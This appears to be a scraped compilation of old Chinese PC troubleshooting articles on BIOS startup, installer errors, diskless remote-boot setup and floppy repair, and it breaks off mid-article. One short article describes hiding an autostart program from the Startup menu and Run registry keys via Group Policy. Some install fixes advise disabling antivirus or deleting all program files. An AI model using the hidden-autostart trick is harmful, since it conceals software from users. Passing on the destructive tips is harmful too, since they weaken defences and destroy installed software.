    电源刚开始供电时电压还是不稳定，主板控制芯片组会向CPU发出一个Reset信号，让CPU初始化。当电源稳定供电后，芯片组便撤去Reset信号，CPU马上从地址FFFFOH处开始执行指令。这个地址在系统BIOS的地址范围内。一般的BIOS放在这里的是一条跳线指令，跳到系统BIOS中真正的启动代码处。系统BIOS的启动代码首先要做的事情就是进行POST(加电自检)。POST的主要任务是检测系统中的一些关键设备是否存在和能否正常工作，如内存和显卡等。如果这个时候系统的喇叭发出的不是一声清脆的“嘀”声，那就有可能是内存条或是显示卡等出故障了。具体的错误一般可以从警报声的长短和次数来判断。至于具体的每种声音代表了什么，由于相关文章已经刊登过多次，这里就不细说了。为什么这时的错误要用声音来报警而不是在屏幕上显示呢，这是因为POST的检测过程在显示卡初始化之前，也就是说这时还是“黑屏”阶段，所以在POST的过程中发现了一些致命错误是无法在屏幕上显示出来的。

    下一步，BIOS将检查显卡的BIOS。找到之后，调用它的初始化代码，由显卡BIOS找来完成显卡的初始化。大多数显卡在这个过程通常会在屏幕上显示出一些显卡的信息，如生产厂商、图形芯片类型、显存容量等内容，这也就是我们开机看到的第一个画面。查找完所有其他设备的BIOS之后，系统BIOS将显示它自己的启动画面，其中包括有系统BIOS的类型、序列号和版本号等内容，同时屏幕左边中上角会出现主板信息代码，包括BIOS的日期、主板芯片组型号、厂家的代码等。接着系统BIOS将检测CPU的类型和工作频率，并将结果显示在屏幕上；然后BIOS开始测试主机的内存容量，并在屏幕上显示内存测试数值。下一步BIOS将开始检测系统中安装的一些标准硬件设备：硬盘、CD-ROM、软驱、串行和并行接口等设备。标准设备检测完毕后，系统BIOS内部支持即插即用的代码将开始检测和配置系统中安装的即插即用设备。这时最常出现的不能启动故障就是找不到硬盘。除线路接触不好外，一般找不到硬盘的原因，主要是硬盘物理损坏，也有可能是硬盘主引导区信息被病毒破坏了。

    到此，所有硬件都已经检测配置完毕，BIOS会重新清屏并在屏幕上方显示出一个系统配置表，其中简略地列出安装的各种标准硬件设备及相关工作参数。接下来系统BIOS将更新ESCD(扩展系统配置数据)。ESCD是系统BIOS用来与操作系统交换硬件配置信息的数据，这些数据被存放在CMOS中。通常ESCD数据只在系统硬件配置发生改变后才会进行更新，并不是每次启动都需要更新。ESCD数据更新完毕后，系统BIOS的启动代码将进行它的最后一项工作，即根据用户指定的启动顺序从软盘、硬盘或光驱启动。以从C盘启动为例，系统BIOS将读取并执行这个活动分区的分区记录和主引导记录。接着，从分区表中找到第一个活动分区，然后读取并执行这个活动分区的分区引导记录。如果在这时候启动出错，那十有八九是软件故障了。软件故障的具体原因很多，概括起来一般无外乎是引导文件、系统文件丢失或被恶意修改。不过，由于硬盘磁道损害而导致系统文件读取失败的原因也不能排除。

    完成上述各项检测后，系统进入Windows并执行各种应用程序的启动，这样整个启动过程就结束了。


隐藏启动程序方法

《一键清理系统垃圾》

隐藏启动程序方法

    让程序可以随系统启动自动加载，并且在“启动”菜单和注册表中都找不到它。方法：
    在“开始→运行”中键入“gpedit.msc”，启动“组策略”，展开“用户配置→管理模板→系统→登录”，启用“在用户登录时运行这些程序”项，并单击“显示”按钮，添加某个程序，重新登录后该程序就会自动运行。
    打开“开始→程序→启动”菜单，看不到我们添加的程序项；在“开始→运行”中键入“regedit.exe”，启动“注册表编辑器”，分别展开分支“HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run”和“HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\Run”，也找不到刚才添加的程序信息。


安装程序启动安装引擎失败

《一键清理系统垃圾》

安装程序启动安装引擎失败

"安装程序启动安装引擎失败：不支持此接口”错误的解决方法

1、在NT平台下（包括Win NT,Win 2000,Win XP），请使用管理员身份登陆后运行安装程序，请确认身份，否则不能进行安装；

2、如果您刚运行完一个安装程序，请稍等几秒再启动下一个安装程序，因为安装程序表面上已经完毕，实际上程序还在进行后期清理，内存中还有 Ikernel.exe（安装程序引擎）驻留，所以如果您此时启动另一个安装程序，将出现错误。

3、如果您安装的过程中出现错误，请使用“任务管理器”察看是否有 Ikernel.exe 这个进程存在，如果存在而且此时您确认没有安装程序在运行，您可以结束这个进程后再进行安装。

4、因为NORDON杀毒软件会把INSTALL SHIELD 那个ikernel.exe文件误认为病毒。退出防火墙，重新启动，就好了。

5、清理干净系统和您系统账户下的 Temp 目录。例如：您系统安装在C盘，windows目录是 winnt ，那么您的系统 Temp 目录是：c:\winnt\temp ，如果您是以“test-user”的账户登陆的，您的个人 Temp 目录是：C:\Documents and Settings\test-user\Local Settings\Temp
请您清理完以上2个目录（删除所有目录内文件）再进安装。

6、删除目录： Program Files\Common Files\InstallShield 重新启动以后再进行安装

7、删除目录： Program Files\Common Files\InstallShield\Engine 重新启动以后再进行安装

8、安装NORTON SYTEMWORKS 2003,用它的WINDOCTOR自动修复,然后用了NORTON SYTEMWORKS的ONE BUTTON CHECKUP,重起,一切OK。

9、现在的好多的软件的安装程序都不是exe的而是msi，而msi是一种新的安装程序的脚本文件。就算有的安装程序是exe的但在它的安装目录里也有个msi文件，实际上是exe调用msi文件来安装程序的。msi是脚本文件，实际上真正运行脚本文件的是“msiexec.exe”它就是一切问题的原因。需要安装instmsiw.exe这个文件，instmsiw.exe是一个压缩包里面包括了所有关于运行msi所需要的文件。运行后问题就可解决了。

10、请重新安装IE 5.X 或者 6.0，如果您是NT平台，请重新安装微软的Service Pack。

11、跟COM接口有关系，此种情况出现概率较小，如感兴趣，可以参照InstallShield解决方案：http://support.installshield.com/kb/view.asp?articleid=Q104986

12、可能潜在引起问题的文件：Stdole32.tlb, stdole2.tlb, or Stdole.tlb ，这3个文件的丢失可能导致安装失败，这3个文件是系统核心文件，如果缺失，请从其它相同操作系统的机器上拷贝到本机的相应目录下。

13、如果您使用的是Win98，强烈建议您安装微软的DCom补丁，该补丁的下载地址为：http://www.microsoft.com/com/dcom/dcom98/download.asp

14、确认您使用的是最新的InstallShield引擎，这条是针对安装程序制作员，请使用 InstallShield最新版本，并保持更新，使您制作出来的安装程序包含的引擎是最新的。

15、默认模拟级别必须设为：标识，其步骤为：
a、单击Windows开始菜单；
b、选择“运行”；
c、输入 DCOMCNFG ，然后确定；
d、如果有任何警告提示，请选择否；
e、“分布式COM配置属性”对话框出现；
f、选择“默认属性”页；
g、将“默认级别”下拉框选择称“标识”；
h、点击应用后确定。

16、引起安装程序错误的还有下列注册表项无法读取（账户等级低）：
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib

请使用 regedt32.exe 来改变账户等级，请改变成以下等级：
Administrator (on the local machine)
System
Created Owner

17、请使用 regedit32.exe 检查HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion下的CommonFilesDir键值后面没有空格或者使用了Tab。比如“C:\Program Files\Common Files”是正确的，但是“C:\Program Files\Common Files ”或者“C:\Program Files\Common Files ”是错误的，请删除掉空格。

18、装了ACDSEE5.0（特别是迷你中文版），有时会导致这种现象，请卸掉5.0，找个其它版本（如4.0）的装一下。
19、按下win+r,输入sfc/scannow，接着顺着向导检查并修复系统文件
20、有的软件安装需要windows installer支持，一般解决方法为：在控制面板－＞管理工具－＞服务中，找到windows installer服务，把启动类型改为手动，然后启动即可。记住在安装好程序后将此服务停止。如果仍然存在问题，请到微软站点下载最新的windows installer 2.0版。
21、关掉病毒监控程序或防火墙
22、打开系统所在分区的程序文件夹，将其中所有文件删除后重启，再重装程序
23、当然是重装系统啦。


在NT下实现无盘启动实战

《一键清理系统垃圾》

在NT下实现无盘启动实战

    本文着重讲述了DOS及WIN95无盘站的安装过程，并提出了安装过程中的一些注意问题。
    一、网络概况
    由于无盘网以运行成本低、易于管理、经济实用等众多优点，在学校、电脑培训中心等地方应用较广。我院就建有一个有15台无盘站的 NT网络，操作系统为Windows NT Server4.0中文版，星型拓扑结构。
    服务器和工作站的配置如下：
    服务器：PⅡ233 CPU、 ASUS 440BX 主板、64M SDRAM、6.4G DiamondMax 硬盘、Accton1207C网卡、SAMSUNG 17英寸彩显。
    无盘工作站：Pentium MMX200 CPU、J－591A主板、32M SDRAM、NE2000Compatible网卡、SAMSUNG 14英寸彩显。
    二、服务器的安装
    由于NT 4.0 Server的安装早有介绍，这里不再赘述，需要注意的是：最好采用NTFS格式以及使用主域服务器。（我的服务器名为ZLL，域名为WHSJY）
    三、无盘工作站的安装（DOS及WIN95）
    (一)DOS无盘站的建立
    无盘站采用NE2000　Compatible网卡，网卡上必须带有一块以RPL（Remote Initial Program Load）方式启动的BOOTROM。
    1.在NT4.0服务器上安装远程启动服务和添加两个网络协议（NetBEUI协议、DLC协议）。
     步骤如下： 　　“控制面板”“网络”“服务” “远程启动服务”“添加” 　　“控制面板”“网络”“协议” “NetBEUI通信协议”“添加” 　　“控制面板”“网络”“协议” “DLC通信协议”“添加”
    2.启动远程启动服务。
    步骤：“控制面板”“服务” “远程启动服务”;
    在启动类型框中选择“自动方式”后，按“确定”按钮。
    3.在完成前三步设置后系统已经具有远程启动的功能，此时再运行“远程启动管理器”来获取无盘站网卡的ID号，然后为其建立轮廓文件和远程启动数据库记录，这是整个网络工作的关键步骤。
    下面是详细的操作规程：
    1启动无盘工作站，工作站通过系统自检后处于等待状况，但其所带的BOOTROM会向服务器端发送一个FIND帧(Frame）信号。信号包含了此工作站的网卡号，远程启动服务器收到启动要求后，即检查数据库中是否有该卡号的启动数据，若有则服务器可提供远程启动服务；若无，则可手动配置，详细方法见后文。
    2运行服务器上的“远程启动管理器”，选择“配置”“检查配置”，然后确定。再选“配置”“修复安全性”后确定。此时窗口会出现一个12位的十六进制数，此即为网卡的ID号。
    3手动为网卡生成新的数据库。具体步骤如下：
    (1)从NTSERVER的光盘中将CLIENTS\RPL\UPDATE目录拷至硬盘下。
    (2)查看NE200CPT.RPL文件的属性，并去掉其“只读”属性，用“记事本”打开，然后将NE2000 Compatible网卡的ID号改为刚才获取的ID号（只取网卡的ID号的前6位），然后保存文件。
    注：并非所有的网卡都能利用BOOTROM启动，如3Com EtherLink Ⅲ其卡号的前6位必须是以0020AF或00608C开头，否则无法被远程启动服务器识别。
    将更新好的NE200CPT.RPL文件拷至C盘根目录下，然后在MS－DOS方式执行如下命令：
    C:\RPLCMD 为提示。实际上C：下的DOS目录与NT SERVER 服务器上的％SYSTEMTOOT％ \RPL\RPLFILES\BINFILES\DOS622 对应。本地硬盘分区则从D：开始。

    (二)PWin95无盘站的安装
    在完成DOS6.22无盘站的安装后，接下来进行无盘PWin95的安装。在安装无盘PWin95之前，首先要准备好一台有盘的PWin95工作站。此外还要为Works A安装一台SBS（Server Based Setup）服务器（就是将PWin95通过Netsetup.exe 安装到某台服务器上，不是拷贝，切记。以后工作站端的PWin95安装操作，就可以利用此服务器的PWin95文件，此服务器称为SBS服务器）。SBS服务器可与NT Server服务器共用一台服务器，也可以使用不同的服务器。我的NT Server服务器即为SBS服务器。在安装无盘PWin95之前必须将一台有盘Works A工作站与NT Server服务器连接。然后开始以下的工作。
    首先在NT Server服务器上新建两个文件夹，pwin95.ins 和 pwin95.shr ，并将其属性设置为共享。其中pwin95.ins 是通过netsetup.exe安装的目录，称为SBS目录，此目录用于保存共用文件。而pwin95.shr 为用户目录，用于保存用户的私有文件，称为机器目录。
    随后把PWin95光盘放入有盘的Works A的光驱中，并运行admin\nettools 目录下的netsetup.exe文件（早期的Win95光盘中有此目录和文件），在执行netsetup.exe后会出现一对话框。选择“设置路径”，输入安装到NT Server服务器的正确路径，即前面提到的SBS目录。（\\zll\pwin95.ins,其中zll为我的服务器名）后确定。此时“设置路径”变成“更换路径”，单击“安装”，出现“源路径”对话框，在安装策略处单击“服务器”，同时指定PWin95的源文件路径，即工作站光盘中PWin95的路径。如：F:\win95net\win95（F:为本地光驱，即以Administrator身份入网的那台机器），确定。
    出现“创建默认值”对话框时，选择“不创建默认值”.
    输入PWin95产品序列号。完成安装后退出。
    回到NT Server服务器上，将Windows NT Server安装光盘放入服务器光驱中，将其\clients\rpl\update\win95下的win95srv.bat文件拷至硬盘根目录下。（也可不拷贝到硬盘上，直接在光盘上执行win95srv.bat文件）然后在命令窗口中执行如下命令：
    g:\clients\rpl\update\win95\win95srv \\zll\pwin95.ins (其中g:为我服务器的光驱，zll为我服务器名) 　　以更新pwin95.ins 目录文件使其具有远程启动功能。
    在NT Server服务器上启动“远程启动管理器”，选择“检查配置”
“修复安全性”以更新系统。
    现在开始安装第一台无盘PWin95工作站。
    首先用一台无盘DOS622机器以Administrator身份登录，在工作站上执行：
    net use f: \\zll\pwin95.ins
    net use g: \\zll\pwin95.shr
    这两条命令是将pwin95.ins与pwin95.shr分别映射成F盘和G盘。
    然后为工作站安装一些专用文件，如：win.ini、system.ini 等。
    注：一定要关掉该工作站的所有物理盘或逻辑盘，否则无盘站无法正常启动。
    在无盘站上运行：
    f:\>setup /t:g:\client1.tmp
    注：此处书写命令时一定要注意在setup后加空格，且一定要带参数t，否则可能无法进行无盘站的安装。
    在安装过程中系统会询问你一些问题，如出现：
    Server－Based Setup 对话框时选，
    Setup Windows To Run Form A Network Server
    出现Setup Method 对话框时选：
    Setup Windows To Run From The Network (Remote Boot Server)
    当出现Machine Diretory 对话框时，在Machine Directory:处输入g:\client1
    出现Startup Opeions选Custom方式。
    注：此处必须选择Custom方式，否则无盘站不能正常的启动PWin95。
    当出现：
    Analyzing Your Computer
    选No I Want To Modify The Hard List
    当出现：
    Delect Comptonetnts
    清除所有选项。
    注：此处必须清除所有选项，否则在进行后面的工作时可能会遇到一些莫名其妙的问题。
    当出现： Network Configuration
    选择 AdapterAdd（增加－网卡），在出现的厂商列表中选择Novell/Anthem，硬件列表中选择NE2000 Compatible卡并设置网卡的中断号(IRQ=3)、I/O Address Range为300－31F。添加NetBEUI、TCP\IP网络协议。
    出现Identification时，确认Workgroup处的SBS服务器与Machine Diretory 处的服务器在相同的Workgroup或Domain。（我的服务器的域名为wuhan，即在Workgroup处填上wuhan）
    回到NT Server服务器中运行“远程启动管理器”，为PWin95建立一个profiles文件（即无盘工作站启动的类型文件）。与无盘DOS工作站建立新的配置文件相同。
    修改配置类型，使无盘工作站使用PWin95的profiles
    在NT Server服务器的命令窗口中执行win95clt.bat。
    格式为：
    c:\>win95clt \\zll\pwin95.shr\client1 \\zllwin95
    此命令属于p win95工作站的Real－Mode启动文件。由Machine－Directory复制远程启动文件到NT Server服务器的％systemroot％\rpl\rplfiles\rplfiles\win95中。（其中％systemroot％为Windows NT的安装目录，即C:\WINNT）
    注：在无盘站上运行setup /t:g:\clientx.tmp的前提条件有二，其一你必须是管理员；其二此台机器必须是真正的无盘站，即设置中要挂掉所有的物理或逻辑驱动器。否则在执行wi95clt命令时会显示两个文件不能复制，而这两个文件又是无盘站启动PWin95时必不可少的autoexec.bat和config.sys文件。若没有这两个文件，而你接下去能做的唯一的事就是重新开始(无盘站安装过程中绝对不能重新启动机器)。切记一定要挂掉所有的驱动器！
    在执行上述命令之后，切记要修改机器目录中的machines.ini文件：
    修改格式为：
    [adapter_id]
    sysdatpath=g:\client_dir
    g=\\ntserver\machine_directory
  对于我的服务器而言，修改结果为：
    [00108801491a]
    sysdatpath=g:\client1
    g=\\zll\pwin95.shr
    注：此文件最好用edit编辑器打开，切记不要用“记事本”打开。还有，此文件刚打开时每一行最前面都有分号，在修改完文件存盘前一定要将分号删除，否则会导致无盘站不能正常启动PWin95。此外还应注意第一字母g的后面有冒号，而第二字母g的后面是不能有冒号的。
    好了，现在重新启动计算机（无盘站），这才真正进入无盘PWin95的安装界面，此后的安装就与有盘的PWin95的安装大致相同。再做一些相应的设置就可以了。
    安装完后再启动机器，就进入PWin95的界面了。
    无盘环境下的PWin95与有盘的有些不同，例如在“我的电脑”中会出现一个芯片的图标，它实际上是系统创建的一个虚拟盘，而在有盘的PWin95中则不存在。
    第二台无盘站的安装与第一台的方法基本相同。只是要注意如果第一台profiles若设为“个人”，则第二台机器的profiles必须与第一台机器的profiles取不同的名称。其它操作都大同小异。

返回


主板电源导致电脑重启动一例

《一键清理系统垃圾》

返回总目录 上一页 目录页

主板电源导致电脑重启动一例

近日一位朋友送来一台电脑，基本配置为：Intel M612主板，赛扬300 CPU，杂牌声卡和一个4MB的AGP显卡。
        故障现象：
        当打开电脑的外接电源时，有时还未按机箱的启动开关，电脑就启动（偶尔发生）。此外电脑在使用过程中，在没有发出任何警告的情况下，也会突然重新启动，并且音箱发出的声音中夹杂着明显的杂音。
        故障查找
        如果是硬件设置冲突而造成故障，那么电脑应该发出出错警告。通过重新安装系统，电脑的故障并没有排除；又对系统进行了杀毒处理，没有发现病毒；仔细检查了计算机的CMOS设置情况，也正常。
        通过现象来看，初步判断故障是由某个硬件接触不良造成的。本着先易后难的原则，先看机箱内部，发现机箱内部的清洁非常好，基本上没有灰尘。接着断开光驱、软驱、取下声卡，显卡查看金手指和主板上相对应的插槽，末发现接触不良或金属杂物引起插口内部短路的现象。这时音箱的电流杂音引起了我的注意。断开音箱，换上耳机，电流杂音还是很大，看来不是喇叭的原因，查看声卡说明书得知，该声卡是采用硬波表技术的PCI声卡，虽是杂牌，但声音输出质量不至于如此低。那么电流杂音又是来自何方呢？上述故障现象之间又有什么联系呢？
        既然喇叭里有电流杂音，那么就先从电源下手，拆开电源，使用万用表测量，电流、电压输出正常，再拔下主板上电源输入插头，这时惊奇地发现插在主板上的电源插头第二排右数第1、2号金属插线柱有明显被电弧烧过的痕迹，并使两根金属插线有轻微粘结的现象。
        故障分析
        由于电源到主板上的接头被烧过，虽未形成断路，但造成接口处内阻增大，实际输入到计算机主板上的电压、电流不足，特别是计算机CPU部件在进行大量数据运算时，所需电压、电流就更大。主板得不到足够而稳定的电压和电流，于是系统发生了重启动现象。主板内的电压和电流不稳定，干扰了声卡的正常运行，使声音输出中夹杂有电流杂音。又由于电源输入插头的金属插线柱有轻微的粘结现象，当两个插线柱未接通时，计算机启动正常，当两个插线柱接通并形成短路时，打开外部电源，计算机错误认为启动钮已接通，于是计算机发生了自行启动的现象。
        经验和教训
        上述故障是由于朋友在清理机箱内部灰尘时，未将主板上的电源插口插紧而造成的。因此希望各位朋友在插主板电源插头时一定要插紧。
        故障处理
        由于该机基本上能使用，估计计算机的电源没有大的问题，故使用工具将金属插线柱上的氧化层细细清除干净，确保接触良好，并使用一张纸片卡在两个插头之间，防止插线柱再次接触，插上插口，启动计算机，通过长时间运行，计算机运行稳定，故障排除。


启动故障

《一键清理系统垃圾》

返回总目录

启动故障

◎硬盘不启动的故障、原因和处理
◎BIOS自检与开机故障相关问题
◎Boot Easy惹麻烦
◎CPU风扇引发的系统启动异常
◎Novell网上远程启动Win95(有盘）
◎NOVELL网无盘启动WIN95进阶
◎Novell网无盘站多重启动
◎Novell网用BootRom启动Win95
◎Novell无盘工作站远程启动故障诊断
◎NOVELL远程启动WIN95（无盘）
◎PNP无盘工作站启动后不能提示找到新硬件的解决
◎去掉win98启动登陆框
◎windows98启动过程。基础知识了。
◎Windows 9X 启动全揭秘
◎Windows 9X启动参数揭秘
◎Windows XP还可以这样重启
◎WINDOWS隐藏启动文件位置
◎把mirserver的所有启动文件添加为win2000服务
◎不重启电脑更改IP地址
◎常见开机引导错误详解
◎处理Windows98不能正常启动故障几法
◎从DOS启动TurboLinux
◎电脑重启故障
◎黑屏故障
◎为什么有的机器无法启动"路由与远程访问"服务?
◎加快Windows 98重启的7种方法
◎间断性“重启”故障的解决
◎系统关机变重启故障
◎解决接通电源后自动开机问题
◎紧急恢复Windows98/2000双启动
◎禁止Win2000启动时读软驱
◎开机启动时的硬盘故障分析及排除
◎快速重启Windows 98
◎启动被禁用的RPC服务
◎启动时硬盘的停顿如何解决？
◎强力输血！打造功能齐全的超级启动盘
◎Windows NT的安全机制浅析
◎让计算机启动更快的十五招
◎如何启动休眠功能
◎如何设置从光驱启动
◎如何找到自启动程序
◎如何自动重启
◎删除启动选项中的选项
◎设置NT网中无盘站的远程启动
◎设置Windows 95无盘工作站的远程启动
◎设置自动关机/重启时间
◎双系统默认启动项更改
◎无盘工作站多重启动映像文件的制作
◎无软驱电脑启动故障一例
◎系统频繁重启只因CPU损坏
◎一、系统启动出现的问题
◎系统启动后为什么直接进入了关机画面
◎显示器启动黑屏的逐步检查法
◎详解MSCONFIG启动项
◎寻找个人电脑启动故障的根源
◎一打开电源就自动开机
◎隐藏启动程序方法
◎用多重启动优化Novell无盘站的内存
◎用好Linux的启动盘
◎安装程序启动安装引擎失败
◎在NT下实现无盘启动实战
◎主板电源导致电脑重启动一例

www.163164.com 下载:《一键清理系统垃圾》程序，保持系统的“苗条”身材与运行速度！

返回总目录


调整软驱磁头偏位

《一键清理系统垃圾》

返回总目录 目录页 下一页

调整软驱磁头偏位

    一台NEC软驱在执行format a:/s指令时，突然听到软驱内部“滋滋”直响，立即关机。重新开机后发现软驱不能正确读盘，提示“SECTOR NOT FOUND”。用该软驱格式化软盘后，可进行自写自读，但在其他软驱中又不能读写，无法通用。
    拆下软驱，拧开后部螺丝，掀开上盖，未见异常现象。估计为出现撞车故障导致磁头移位。
    按照专业法调整，需要专业设备，目前不具备。只好参考有关书籍进行业余调整。
    因为软驱磁头位移为开环控制，对精度要求相对较高，调整时要小心谨慎，作好相应标记以便恢复原位。
    用dir a:命令不能准确读出根目录文件，由DOS原理可知此时读00道数据，因此故障可能是磁头在00道定位不准。
    该软驱00道传感器位于驱动器右上角，为一光电传感器。平时光敏管导通，当磁头向00道移动到位时，磁头小车上有一黑色塑料挡板挡住发光二极管光线，光敏管截止，系统认定已到00道。因为磁头小车为步进电机螺杆传动，本身不可调整，因此本故障只要调整00道传感器位置就可纠正磁头00道定位偏移。
    自行调整时需先关机，拧松传感器固定螺丝，向上或向下稍微移动传感器（移动幅度小于1毫米），再开机，用dir a:看一下效果。实际调整时发现关机后再开机时，或设置自检寻道时，磁头才进入00道调整后的位置，否则磁头仍不移动。
    笔者在用以上方法多次调整仍不能取得满意效果，经过实践，改为如下方法获得成功:
    用烙铁拆下步进电机，从软驱中将其抽出，用一黑纸片挡在光敏管与发光管之间，然后开机，屏幕有时提示错，（因为未接步进电机）按F1即可，因为此时光敏管截止，计算机认为00道已到，这样就可以在无步进电机的干扰下，很轻松地移动磁头小车，它的任意位置都可以看作00道了。而且可以随时用dir a:来看效果。一般十多次即可读出根目录。此时可做相应标记，我是把小车的塑料架位置划在底板上，痕迹越细，越精确。当然用卡尺等测量会更精确。
    然后装上电机，调整光电检测器的位置，使得开机时磁头小车的位置与标记相符即可，一般只要调整五六次即可成功。
    另外我在调试中发现，在经过以上粗调以后，转动步进电机的位置（它由两个螺丝固定，松开旋转即可，一般不超过30度）可起到细调的效果。


加快软驱传输速度

《一键清理系统垃圾》

加快软驱传输速度

    可以通过修改系统注册表以获得较高的数据传输速度。具体方法如下：打开系统注册表编辑器，找到“HEKY_LOCAL_MACHINE\System\CurrentControlset\Services\Class\FCD\000”，在右边的窗口空白处，点击鼠标的右健新建一个“DWORD”值，命名为“Fore-Fifo”，健值设定为“0”。最后关闭注册表编辑器，重新启动电脑，一切就OK了


揭开软驱不能读盘之谜

《一键清理系统垃圾》

揭开软驱不能读盘之谜

    据朋友反映，他的这台电脑以前还运转正常，只是在前些天将软驱拆下来借与别人用了一天后便发现不能读盘了。
    维修时，我本着先软后硬的原则，先后检查了Win98及BIOS中与软驱有关的各项设置、病毒、软驱电源线与数据线及主板等项，均无意外。但该软驱还是读不出盘来。
    此时，我开始怀疑这个软驱是不是坏了。我将软驱从机箱中拆下来，看了看外观，没发现什么问题，决定将软驱连好线后放在机箱外面的桌子上再试试看。开机进入Win98后放入一张软盘，嘿！这软驱还真的能读盘了，我又多换了几张软盘，每张盘都顺利地读出来了。看来软驱本身是没有问题的，但为什么装在机箱里就不能读盘了呢？问题很可能就出在这个机箱上。接下来我开始打量起这个机箱来，这个机箱牌子不明，做工粗糙，除了另配的百胜电源比较好外，其它的地方都不值得一提。经仔细检查，我发现这个机箱面板上的软驱退盘按钮尺寸比较大，而反面与SONY软驱退盘按钮接触的地方做工粗糙且比一般的按钮厚。会不会是这个按钮不标准导致软驱不能读盘呢？为了验证我的想法，我再次将软驱装入机箱中，上紧螺丝，开机后放入软盘一试，软驱又不能正常工作了。实验证明，我的分析是正确的，故障的原因就是由于机箱面板上的软驱退盘按钮尺寸不标准，与软驱自身的退盘按钮接触过于紧密，从而造成软盘插入软驱后，软盘并没有完全到位，软驱的夹盘器不能将软盘完全夹紧，使软驱的磁头不能很好地接触到软盘的盘片，磁头与盘片处于半接触半分离状态，最终导致读盘失败。这就好比我们在软驱读盘时始终用手指半压在软驱的退盘按钮上一样。找到故障的原因后，解决起来就好办多了，用螺丝刀将软驱的四个螺丝松开，将软驱向后稍微挪动几毫米，然后再上紧螺丝，开机后再次进行检测，软驱功能恢复正常，故障就此顺利地排除了。


解决不定时搜寻软驱问题

《一键清理系统垃圾》

解决不定时搜寻软驱问题

    如果Windows 98/Me 常常会有事没事就去检查软驱，可以从下面几个方面依顺序来检查，排除问题。以下越在前面的方法，可能性越大。
    ·清除开始菜单中，「文档」里的资料，如果你曾经开启过软盘上的文件，而这文件名称还存在于「文档」里的话，Windows 有可能会去搜寻软驱。
    ·清除开始菜单中，「运行」里的项目。
    ·到「设置」>>「控制面板」，打开「系统」，到「性能」这页，按「文件系统」，到「磁盘」，不要勾「每次开机就搜寻新的软驱」，按确定，当你重新启动计算机之后，Windows 就不会去侦测你的软驱。
    ·检查一下是不是你的防毒软件会去检查软驱（例如 McAfee 、Antivirus 、Pccillin..等），请查阅你的防毒软件说明。
    ·检查一下是不是你计算机上的一些工具软件会去检查你的软驱。
    ·检查 MSDOS.SYS 这个文件里面（你必须知道如何修改文件属性，才能修改 MSDOS.SYS 的内容），有没有 LocalLoadHigh=1 这一行叙述，有的话，删掉。
    ·检查一下是不是病毒的关系，造成系统不定时去搜寻软驱（例如 NEUVILLE 病毒）。
    ·检查 registry：HKEY_CLASSES_ROOT/CLSID 的值，看看有没有任何的路径是指向到软盘上的。


解决自动搜索软驱

《一键清理系统垃圾》

解决自动搜索软驱

    现象：系统有时会自动去读软驱，例如每次启动系统时、打开控制面板时、关闭系统时。听着那“吱吱”的声音，心中真不是滋味。

    能不能设置一下，让系统不再去自动搜索软驱呢？

    解答：这个实现起来不难。请朋友们参照以下几种情况分别进行设置：

    (1)Windows 9x/Me：右击“我的电脑”，打开“系统属性”窗口，点击“性能/文件系统”按钮，在“软盘”标签页中取消“每次启动计算机时都搜索新的软盘驱动器(S)”复选项。

    (2)Windows 2000/XP：可以在设备管理器中将“软盘驱动器/Floppy disk drive”暂时停用，需要使用时再重新启用即可。

    (3)防病毒软件的设置：例如KVW3000、Norton AntiVirus会在启动系统时自动搜索软驱，瑞星杀毒软件会在每次关机时自动搜索软驱，只要取消这些设置就行了。

    (4)文件记忆功能：Word和Excel有一个文件记忆功能，那就是如果最后一次运行程序时访问过软盘上的文件，那么下次打开程序时仍然会自动搜索软驱。解决的办法是不要让Office的文件检索功能自动运行。


清洁软驱磁头的三种方法

《一键清理系统垃圾》

清洁软驱磁头的三种方法

    软驱磁头是软盘驱动器的核心部件，为了延长磁头的使用寿命，需要定期对其进行清洗保养。在此介绍三种清洗磁头的方法。
    一、用清洗盘擦磁头
    清洗盘是一种特制的软盘，抹上计算机软驱磁头专用清洁液，放入驱动器后，自动转动，将灰尘和磁头上的污垢吸附在盘上。如果手边一时没有清洗盘，也可以使用一张新的软盘放入被清洗的驱动器中，先执行格式化命令（FORMAT），然后执行磁盘检查命令（SCANDISK）依次对磁道进行检查，反复几次即可。这样做的目的是将一些浮动的灰尘吸到软盘的吸尘层中。此方法操作虽简单，但较顽固的附着物是不易清洗的。
    二、用清洁液擦洗磁头
    用棉花棒蘸上计算机软驱磁头专用清洁液来擦洗磁头，则可以将较顽固的附着物擦去。注意，使用棉花棒擦磁头一定要小心，不要把磁头碰坏。
    三、用麂皮抛光磁头
    将擦照相机镜头用的干净麂皮剪成长10毫米～20毫米，宽5毫米的长条，在长条的两头穿两个小孔，用两把镊子分别夹住两个小孔，然后把麂皮条放到磁头上，用镊子拉住麂皮左右运动抛光磁头，把污垢除去。注意，这种方法只能用于固定磁头，而不适合于浮动磁头。一般清洗可以使用第一种方法，如果还不见效，则可以采用第二、三种方法。


让旧软驱起死回生

《一键清理系统垃圾》

让旧软驱起死回生

    本人曾经用坏过两个软驱，症状是不能读写，总是提示软驱中没有软盘，偶尔能够读写常常是半途出错，出现蓝屏现象。看着两个旧软驱弃之可惜，又想起《电脑报》上曾经介绍过磁头偏移可导致不能正常读写，于是便决定自己动手探个究竟。

